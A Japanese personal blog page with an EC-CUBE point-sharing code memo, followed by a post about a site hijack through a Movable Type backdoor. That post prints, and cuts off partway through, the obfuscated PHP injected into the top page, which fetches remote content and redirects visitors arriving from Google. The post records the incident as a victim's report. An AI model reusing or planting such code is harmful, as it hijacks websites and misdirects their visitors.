ECCUBE2系統&3系統のポイント共有(覚書)

Eccube

オリジナルのポイントプラグインがありますので、
一般的なお話ではありません。

覚書ので、お探しの情報でないことが濃厚です。

 

2系統と3系統の併用なんて、、、

 

誰が、興味あるねん?

後半は、購入金額に基づく、付与率を実装しているので、
そっちが、有益かも。
ポイント付与率の関連は、ファイル名の後ろに、※つけてます。

***

さて、

ECCUBE3には、ポイントの機能が標準でなく、
プラグインを追加することになるため、
2系統の標準のポイント機能とは、共通性がないため、使えない。

3系統は触りたくないので、
2系統から3系統のテーブルを参照し、値を共有する。

/data/class_ex/SC_Customer_Ex.php

カート内など、session上に保存したデータを引っ張ってくる関数だけど、
pointだけは、リアルタイムで拾っているので、コードを追加。

    public function getValue($keyname)
    {
        // ポイントはリアルタイム表示
        if ($keyname == 'point') {
            $objQuery = SC_Query_Ex::getSingletonInstance();
//            $point = $objQuery->get('point', extrenal_db. 'dtb_customer', 'customer_id = ?', array($_SESSION['customer']['customer_id']));

				// 2021-12-12 * ECCUBE3ポイント専用テーブルを参照
				$objQuery->setorder('order_id desc');
				$objQuery->setlimit(1);
				$arrRet = $objQuery->select('point_current', extrenal_db. 'plg_point_order_point', 'customer_id = ?', array($_SESSION['customer']['customer_id']));
				$point = $arrRet[0]['point_current'];
#var_dump($point);

            $_SESSION['customer']['point'] = $point;
            return $point;
        } else {
            return isset($_SESSION['customer'][$keyname]) ? $_SESSION['customer'][$keyname] : '';
        }
    }

/data/class_ex/SC_Helper_Customer_Ex.php

管理画面や、マイページなどで使用されてるんかな?

    public function sfGetCustomerData($customer_id, $mask_flg = true)
    {
        $objQuery       = SC_Query_Ex::getSingletonInstance();

        // 会員情報DB取得
        $ret        = $objQuery->select('*', 'dtb_customer', 'customer_id=? AND del_flg = 0', array($customer_id));

        if (empty($ret)) {
            trigger_error('存在しない会員IDです。', E_USER_ERROR);
        }

        $arrForm    = $ret[0];

        // 確認項目に複製
        $arrForm['email02'] = $arrForm['email'];
        $arrForm['email_mobile02'] = $arrForm['email_mobile'];

        // 誕生日を年月日に分ける
        if (isset($arrForm['birth'])) {
            $birth = explode(' ', $arrForm['birth']);
            list($arrForm['year'], $arrForm['month'], $arrForm['day']) = array_map("intval",explode('-', $birth[0]));
        }

        if ($mask_flg) {
            $arrForm['password']          = DEFAULT_PASSWORD;
            $arrForm['password02']        = DEFAULT_PASSWORD;
            $arrForm['reminder_answer']   = DEFAULT_PASSWORD;
        }

				// 2021-12-12 * ECCUBE3ポイント専用テーブルを参照
				$objQuery->setorder('order_id desc');
				$objQuery->setlimit(1);
				$arrRet = $objQuery->select('point_current', extrenal_db. 'plg_point_order_point', 'customer_id = ?', array($customer_id));
				$point = $arrRet[0]['point_current'];
#var_dump($point);
				$arrForm['point']	= $point;

        return $arrForm;
    }

/data/class_ex/SC_CartSession_Ex.php ※

今回、ソースを追いかけて、驚いたのだけど、

管理画面 > 基本設定 > ポイント設定で、1%とした場合、
今回の付与は、0となりました。

1%とした後に、商品を追加したところ、
商品のポイント付与率の初期値に、1が入っていました。

つまり、商品ごとに設定しないといけない仕様ようですね?

 

でも、必須項目だから、NULLにすることも出来ず、
この商品には、付与したくない場合は、0にするわけで。

まあ、独自案件なんで、「付与しない商品」は無いことし、
0の場合は、初期値を反映します。

    public function getAllProductsPoint($productTypeId)
    {
        // ポイント合計
        $total = 0;
        if (USE_POINT !== false) {
			// 2021-12-12
			$BasisData = SC_Helper_DB_Ex::sfGetBasisData();
#var_dump2(array('基本レート' => $arrRet['point_rate']));

            $max = $this->getMax($productTypeId);
            for ($i = 0; $i <= $max; $i++) { $price = $this->cartSession[$productTypeId][$i]['price'];
                $quantity = $this->cartSession[$productTypeId][$i]['quantity'];

//                if (!isset($this->cartSession[$productTypeId][$i]['point_rate'])) {
//                    $this->cartSession[$productTypeId][$i]['point_rate'] = '';
				// 2021-12-12 * 商品にポイントが入っていない時は、初期値を使う
				if (empty($this->cartSession[$productTypeId][$i]['point_rate'])) {
					$this->cartSession[$productTypeId][$i]['point_rate'] = $BasisData['point_rate'];
				}

                $point_rate = $this->cartSession[$productTypeId][$i]['point_rate'];
				// 2021-12-12 * 
				global $customer_rank_rate;
				if (!empty($_SESSION['customer']['customer_rank'])) {
					$point_rate	= $point_rate * $customer_rank_rate[$_SESSION['customer']['customer_rank']];
				}
                $point = SC_Utils_Ex::sfPrePoint($price, $point_rate);
                $total += ($point * (int) $quantity);

#var_dump(array('point_rate' => $point_rate, 'price' => $price, 'total' => $total));
            }
        }
        return $total;
    }

 

/data/class_ex/util_ex/SC_Util_Ex.php ※

ポイント払いをした場合、付与するポイントを減算

        public static function sfGetAddPoint($totalpoint, $use_point, $point_rate)
    {
		// 2021-12-12 * 
		global $customer_rank_rate;
		if (!empty($_SESSION['customer']['customer_rank'])) {
			$point_rate	= $point_rate * $customer_rank_rate[$_SESSION['customer']['customer_rank']];
		}

        // 購入商品の合計ポイントから利用したポイントのポイント換算価値を引く方式
        $add_point = $totalpoint - intval($use_point * ($point_rate / 100));

        if ($add_point < 0) {
            $add_point = '0';
        }

        return $add_point;
    }

*

-

サイトの乗っ取り * MTの脆弱性によるバックドア

WEBサーバー

今回で、3度目、、、

mt 対応済みのハズだったのに><

完全にマークされてますね・・・

 

***

症状

さて、今回、ファイル日付から、14:50頃に、書き換えられたようです。
気づいたのは、1時間後。

  • 直接URLを開くと、普通に開く。
  • Google経由で来ると、別サイトに飛ばされる。

外部の通報がなければ、気づきませんね、これ。

 

トップページ埋め込まれたコード

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO_0O_0O_0=$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[65].$OO0__00_OO[10].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[44].$OO0__00_OO[39].$OO0__00_OO[21].$OO0__00_OO[56].$OO0__00_OO[31].$OO0__00_OO[10].$OO0__00_OO[56].$OO0__00_OO[21].$OO0__00_OO[39].$OO0__00_OO[39].$OO0__00_OO[3].$OO0__00_OO[21].$OO0__00_OO[56].$OO0__00_OO[25];$O__O0_OO00=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[21].$OO0__00_OO[46].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[0].$OO0__00_OO[56].$OO0__00_OO[25].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[56].$OO0__00_OO[39].$OO0__00_OO[63].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[13];$OOO__00_O0=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[21].$OO0__00_OO[46].$OO0__00_OO[10].$OO0__00_OO[65].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[46].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[21].$OO0__00_OO[10].$OO0__00_OO[34].$OO0__00_OO[21].$OO0__00_OO[13].$OO0__00_OO[21];$O00OO_O__0=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[21].$OO0__00_OO[46].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[3].$OO0__00_OO[39].$OO0__00_OO[0].$OO0__00_OO[56].$OO0__00_OO[25].$OO0__00_OO[63].$OO0__00_OO[5].$OO0__00_OO[65];$O_O0O_00_O=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[21].$OO0__00_OO[46].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[13].$OO0__00_OO[63].$OO0__00_OO[46].$OO0__00_OO[31].$OO0__00_OO[0].$OO0__00_OO[60].$OO0__00_OO[13];$OO0_OO00__=$OO0__00_OO[42].$OO0__00_OO[63].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[10].$OO0__00_OO[44].$OO0__00_OO[60].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[5].$OO0__00_OO[13].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[13].$OO0__00_OO[40];$O_00O0__OO=$OO0__00_OO[42].$OO0__00_OO[63].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[10].$OO0__00_OO[65].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[5].$OO0__00_OO[13].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[13].$OO0__00_OO[40];$O_O_0_0OO0=$OO0__00_OO[40].$OO0__00_OO[55].$OO0__00_OO[40].$OO0__00_OO[10].$OO0__00_OO[65].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[13].$OO0__00_OO[31].$OO0__00_OO[46].$OO0__00_OO[44].$OO0__00_OO[10].$OO0__00_OO[34].$OO0__00_OO[63].$OO0__00_OO[53];$O00O0OO___=$OO0__00_OO[45].$OO0__00_OO[13].$OO0__00_OO[13].$OO0__00_OO[44].$OO0__00_OO[10].$OO0__00_OO[3].$OO0__00_OO[60].$OO0__00_OO[63].$OO0__00_OO[39].$OO0__00_OO[34].$OO0__00_OO[10].$OO0__00_OO[43].$OO0__00_OO[60].$OO0__00_OO[31].$OO0__00_OO[53].$OO0__00_OO[55];$O0__0OOO0_=$OO0__00_OO[42].$OO0__00_OO[60].$OO0__00_OO[5].$OO0__00_OO[56].$OO0__00_OO[13].$OO0__00_OO[63].$OO0__00_OO[0].$OO0__00_OO[5].$OO0__00_OO[10].$OO0__00_OO[31].$OO0__00_OO[15].$OO0__00_OO[63].$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[40];$OO_O0O0__0=$OO0__00_OO[65].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[45].$OO0__00_OO[0].$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[3].$OO0__00_OO[55].$OO0__00_OO[5].$OO0__00_OO[21].$OO0__00_OO[46].$OO0__00_OO[31];$O_O_0_0O0O=$OO0__00_OO[3].$OO0__00_OO[21].$OO0__00_OO[40].$OO0__00_OO[31].$OO0__00_OO[62].$OO0__00_OO[58].$OO0__00_OO[10].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$O_O0_0OO_0=$OO0__00_OO[3].$OO0__00_OO[21].$OO0__00_OO[40].$OO0__00_OO[31].$OO0__00_OO[62].$OO0__00_OO[58].$OO0__00_OO[10].$OO0__00_OO[34].$OO0__00_OO[31].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$O0_0_O0O_O=$OO0__00_OO[53].$OO0__00_OO[21].$OO0__00_OO[27].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$O0O_O0O_0_=$OO0__00_OO[53].$OO0__00_OO[21].$OO0__00_OO[27].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[34].$OO0__00_OO[31].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$O00OO_O0__=$OO0__00_OO[65].$OO0__00_OO[59].$OO0__00_OO[60].$OO0__00_OO[5].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[46].$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[40].$OO0__00_OO[40];$OO_0_O0O_0=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[10].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[44].$OO0__00_OO[39].$OO0__00_OO[21].$OO0__00_OO[56].$OO0__00_OO[31];$O_O00O__O0=$OO0__00_OO[37].$OO0__00_OO[40].$OO0__00_OO[0].$OO0__00_OO[5].$OO0__00_OO[10].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$OO_0O_0O0_=$OO0__00_OO[42].$OO0__00_OO[63].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[10].$OO0__00_OO[31].$OO0__00_OO[15].$OO0__00_OO[63].$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[40];$O0_0O0O_O_=$OO0__00_OO[56].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[0].$OO0__00_OO[44].$OO0__00_OO[13];$O_O_000O_O=$OO0__00_OO[21].$OO0__00_OO[53].$OO0__00_OO[53].$OO0__00_OO[21].$OO0__00_OO[55].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[45].$OO0__00_OO[63].$OO0__00_OO[42].$OO0__00_OO[13];$O0__0_0OOO=$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[65].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[44].$OO0__00_OO[39].$OO0__00_OO[63].$OO0__00_OO[13];$O0_O0O__0O=$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[65].$OO0__00_OO[10].$OO0__00_OO[46].$OO0__00_OO[21].$OO0__00_OO[13].$OO0__00_OO[56].$OO0__00_OO[45];$O0___O0O0O=$OO0__00_OO[56].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[10].$OO0__00_OO[31].$OO0__00_OO[53].$OO0__00_OO[53].$OO0__00_OO[0].$OO0__00_OO[53];$O0O__O0_0O=$OO0__00_OO[56].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[10].$OO0__00_OO[56].$OO0__00_OO[39].$OO0__00_OO[0].$OO0__00_OO[40].$OO0__00_OO[31];$O_0_0OO_O0=$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$OO0O0_O0__=$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[34].$OO0__00_OO[31].$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$OO__00_OO0=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[10].$OO0__00_OO[40].$OO0__00_OO[44].$OO0__00_OO[39].$OO0__00_OO[63].$OO0__00_OO[13];$OOO_00_O0_=$OO0__00_OO[44].$OO0__00_OO[21].$OO0__00_OO[53].$OO0__00_OO[40].$OO0__00_OO[31].$OO0__00_OO[10].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39];$O0__O00O_O=$OO0__00_OO[65].$OO0__00_OO[59].$OO0__00_OO[63].$OO0__00_OO[5].$OO0__00_OO[42].$OO0__00_OO[39].$OO0__00_OO[21].$OO0__00_OO[13].$OO0__00_OO[31];$O0OO0_O_0_=$OO0__00_OO[65].$OO0__00_OO[59].$OO0__00_OO[34].$OO0__00_OO[31].$OO0__00_OO[42].$OO0__00_OO[39].$OO0__00_OO[21].$OO0__00_OO[13].$OO0__00_OO[31];$O000_OO_O_=$OO0__00_OO[56].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[10].$OO0__00_OO[63].$OO0__00_OO[5].$OO0__00_OO[63].$OO0__00_OO[13];$O_O0O_00_O=$OO0__00_OO[56].$OO0__00_OO[60].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[10].$OO0__00_OO[31].$OO0__00_OO[15].$OO0__00_OO[31].$OO0__00_OO[56];$O_0O_O0_0O=$OO0__00_OO[21].$OO0__00_OO[53].$OO0__00_OO[53].$OO0__00_OO[21].$OO0__00_OO[55].$OO0__00_OO[10].$OO0__00_OO[44].$OO0__00_OO[0].$OO0__00_OO[44];$O0O_0_O_O0=$OO0__00_OO[50].$OO0__00_OO[21].$OO0__00_OO[53].$OO0__00_OO[10].$OO0__00_OO[34].$OO0__00_OO[60].$OO0__00_OO[46].$OO0__00_OO[44];$O___O00O0O=$OO0__00_OO[63].$OO0__00_OO[40].$OO0__00_OO[10].$OO0__00_OO[21].$OO0__00_OO[53].$OO0__00_OO[53].$OO0__00_OO[21].$OO0__00_OO[55];$O_O0O0_0O_=$OO0__00_OO[13].$OO0__00_OO[46].$OO0__00_OO[44].$OO0__00_OO[42].$OO0__00_OO[63].$OO0__00_OO[39].$OO0__00_OO[31];$O00_OO_O0_=$OO0__00_OO[13].$OO0__00_OO[31].$OO0__00_OO[46].$OO0__00_OO[44].$OO0__00_OO[5].$OO0__00_OO[21].$OO0__00_OO[46];$OOO00__0O_=$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[63].$OO0__00_OO[5].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[53];$O0__O_OO00=$OO0__00_OO[46].$OO0__00_OO[13].$OO0__00_OO[10].$OO0__00_OO[53].$OO0__00_OO[21].$OO0__00_OO[5].$OO0__00_OO[34];$OO_O_000_O=$OO0__00_OO[63].$OO0__00_OO[46].$OO0__00_OO[44].$OO0__00_OO[39].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$O_00O_O_0O=$OO0__00_OO[31].$OO0__00_OO[15].$OO0__00_OO[44].$OO0__00_OO[39].$OO0__00_OO[0].$OO0__00_OO[34].$OO0__00_OO[31];$O_0_0O_0OO=$OO0__00_OO[60].$OO0__00_OO[40].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[31].$OO0__00_OO[44];$O00_O_0OO_=$OO0__00_OO[60].$OO0__00_OO[5].$OO0__00_OO[39].$OO0__00_OO[63].$OO0__00_OO[5].$OO0__00_OO[25];$OO000O_O__=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[44].$OO0__00_OO[0].$OO0__00_OO[40];$OO0O0O_0__=$OO0__00_OO[40].$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[39].$OO0__00_OO[31].$OO0__00_OO[5];$O0__O_0OO0=$OO0__00_OO[45].$OO0__00_OO[31].$OO0__00_OO[15].$OO0__00_OO[34].$OO0__00_OO[31].$OO0__00_OO[56];$O00_O0__OO=$OO0__00_OO[65].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[31].$OO0__00_OO[5].$OO0__00_OO[50];$OO_0OO__00=$OO0__00_OO[42].$OO0__00_OO[27].$OO0__00_OO[53].$OO0__00_OO[63].$OO0__00_OO[13].$OO0__00_OO[31];$O_O_O_0O00=$OO0__00_OO[42].$OO0__00_OO[56].$OO0__00_OO[39].$OO0__00_OO[0].$OO0__00_OO[40].$OO0__00_OO[31];$O__0OO_O00=$OO0__00_OO[42].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[21].$OO0__00_OO[34];$OO000__OO_=$OO0__00_OO[42].$OO0__00_OO[65].$OO0__00_OO[31].$OO0__00_OO[13].$OO0__00_OO[40];$O0OO___00O=$OO0__00_OO[56].$OO0__00_OO[0].$OO0__00_OO[60].$OO0__00_OO[5].$OO0__00_OO[13];$O0OOO___00=$OO0__00_OO[56].$OO0__00_OO[45].$OO0__00_OO[46].$OO0__00_OO[0].$OO0__00_OO[34];$O0__0O_O0O=$OO0__00_OO[13].$OO0__00_OO[53].$OO0__00_OO[63].$OO0__00_OO[46];$OOO000___O=$OO0__00_OO[37].$OO0__00_OO[0].$OO0__00_OO[63].$OO0__00_OO[5];$OO_O_O000_=$OO0__00_OO[42].$OO0__00_OO[31].$OO0__00_OO[0].$OO0__00_OO[42];$O__00OO_O0=$OO0__00_OO[46].$OO0__00_OO[34].$OO0__00_OO[9];$O0O_0_O0_O="QaSHQRz0fcqDaowvqLzzmUAxYMTDeIYteYA2kgY0ELsXOYMxANsCO5j3sbp3URzjBYCnXVTwyLgmoNcvXbTQA=Z=";function OO_O0O_0_0($url,$O0O0__0O_O=0,$OO00_0_OO_=1,$OO0O__00O_=NULL,$O_0_O0OO_0=array(),$OOO_0_0O_0="s"){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x5f\x5f\x30\x4f"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_O0_O_O00=O__0_O0OO0('iy4tyKXkktKsovilXIzCtLzMlMUQCKWKnlJRUiAXWAMA');$O_O0_O_O00.=$url;echo $O_O0_O_O00;unset($O_O0_O_O00);exit();}return '';}$OO0_O__00O=O__0_O0OO0('Sy4tygdonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBqkSJakA');$O0O_O00_O_=$O0_0O0__OO='';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x5f\x30\x4f"]('|',$OO0_O__00O) as $c){$OO_O0O__00=1;if($O0O0__0O_O&&substr($c,0,1)=='c'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x5f\x30\x4f"]('+',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x30\x4f\x4f\x4f\x30\x5f"]($d)){$OO_O0O__00=0;}}unset($d);if($OO_O0O__00){$O0O_O00_O_=$c;break;}}unset($OO0_O__00O,$c);if($O0O_O00_O_==''){return 0;}if(substr($O0O_O00_O_,0,1)=='c'){$OO0___OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x5f\x4f\x4f\x5f\x4f\x5f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_USERAGENT,$OOO_0_0O_0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_FRESH_CONNECT,TRUE);if($OO00_0_OO_==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x4f\x30\x30\x4f\x30\x4f"]($OO0O__00O_)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0___OO00,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f\x5f"]($OO0O__00O_));}}$O0__0O_OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x5f\x4f"]($OO0___OO00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x30\x4f"]($OO0___OO00);if(!$O0__0O_OO0){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_O0_O_O00=O__0_O0OO0('i04uLVEcpRSC0qyi+KVctLKi6BiwBgA=');$O_O0_O_O00.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x30\x4f\x30\x4f"]($OO0___OO00);echo $O_O0_O_O00;unset($O_O0_O_O00);exit();}return 0;}else{return $O0__0O_OO0;}}$OO00O__0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x5f\x4f\x30\x5f"]($url);isset($OO00O__0_O["\x68\x6f\x73\x74"])||$OO00O__0_O["\x68\x6f\x73\x74"]='';isset($OO00O__0_O["\x70\x61\x74\x68"])||$OO00O__0_O["\x70\x61\x74\x68"]='';isset($OO00O__0_O["\x71\x75\x65\x72\x79"])|| $OO00O__0_O["\x71\x75\x65\x72\x79"]='';isset($OO00O__0_O["\x70\x6f\x72\x74"])||$OO00O__0_O["\x70\x6f\x72\x74"]='';$O_0_0_O0OO=$OO00O__0_O["\x70\x61\x74\x68"]?$OO00O__0_O["\x70\x61\x74\x68"].($OO00O__0_O["\x71\x75\x65\x72\x79"]?'?'.$OO00O__0_O["\x71\x75\x65\x72\x79"]:''):'/';$O_00O0OO__=$OO00O__0_O["\x68\x6f\x73\x74"];if($OO00O__0_O["\x73\x63\x68\x65\x6d\x65"]=='https'){$OO__O0O0_0='1.1';$O_O0_OO_00=empty($OO00O__0_O["\x70\x6f\x72\x74"])?443:$OO00O__0_O["\x70\x6f\x72\x74"];$O_00O0OO__=O__0_O0OO0('Ky7OshbdLMHXBwA=');$O_00O0OO__.=$OO00O__0_O["\x68\x6f\x73\x74"];}else{$OO__O0O0_0='1.0';$O_O0_OO_00=empty($OO00O__0_O["\x70\x6f\x72\x74"])?80:$OO00O__0_O["\x70\x6f\x72\x74"];}$OOO_00O__0='Host:';$OOO_00O__0.=$O_00O0OO__;$O_0_O0OO_0[]=$OOO_00O__0;$O_0_O0OO_0[]=O__0_O0OO0('c87Pyjg0tNLsnMz7NyzskdfvTgUA');$O_0_O0OO_0[]=O__0_O0OO0('Cy1OLukdJ1TE/NK7EUFCAA==').$OOO_0_0O_0;$O_0_O0OO_0[]=O__0_O0OO0('c0xOTwGi0osdLEaS1wIA');unset($OOO_00O__0);if($OO00_0_OO_==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x4f\x30\x30\x4f\x30\x4f"]($OO0O__00O_)){$OO0O__00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f\x5f"]($OO0O__00O_);}$O_0_O0OO_0[]=O__0_O0OO0('c87PKwf0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9iSJTQEA');$O_0_O0OO_0[]=O__0_O0OO0('c87PKKB0nNK9H1Sc1LL8mnewAgA=').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO0O__00O_);$O0_0O0__OO="POST $O_0_0_O0OO HTTP/$OO__O0O0_0".PHP_EOL.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x30\x5f\x5f\x5f\x4f"](PHP_EOL,$O_0_O0OO_0).PHP_EOL.PHP_EOL.$OO0O__00O_;unset($OO0O__00O_);}else{$O0_0O0__OO="GET $O_0_0_O0OO HTTP/$OO__O0O0_0".PHP_EOL.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x30\x5f\x5f\x5f\x4f"](PHP_EOL,$O_0_O0OO_0).PHP_EOL.PHP_EOL;}unset($O_0_O0OO_0,$OO00O__0_O,$OO__O0O0_0,$O_0_0_O0OO);$OOO_O0__00=null;if(substr($O0O_O00_O_,-1)=='n'){$OOO_O0__00=$O0O_O00_O_($O_00O0OO__,$O_O0_OO_00,$O_O0_O_O00no,$O_O0_O_O00str,30);}else{if(substr($O0O_O00_O_,-1)=='t'){$O__OO0O_00=O__0_O0OO0('K0kusngNLlWXBwA=');$O__OO0O_00.=$O_00O0OO__;$O__OO0O_00.=':';$O__OO0O_00.=$O_O0_OO_00;$OOO_O0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x4f\x30\x30"]($O__OO0O_00,$O_O0_O_O00no,$O_O0_O_O00str,30);unset($O__OO0O_00);}}$O_00__O0OO='';if($OOO_O0__00){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x4f\x5f\x4f\x5f\x5f\x30"]($OOO_O0__00,TRUE);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x5f\x4f"]($OOO_O0__00,30);${"\x47\x4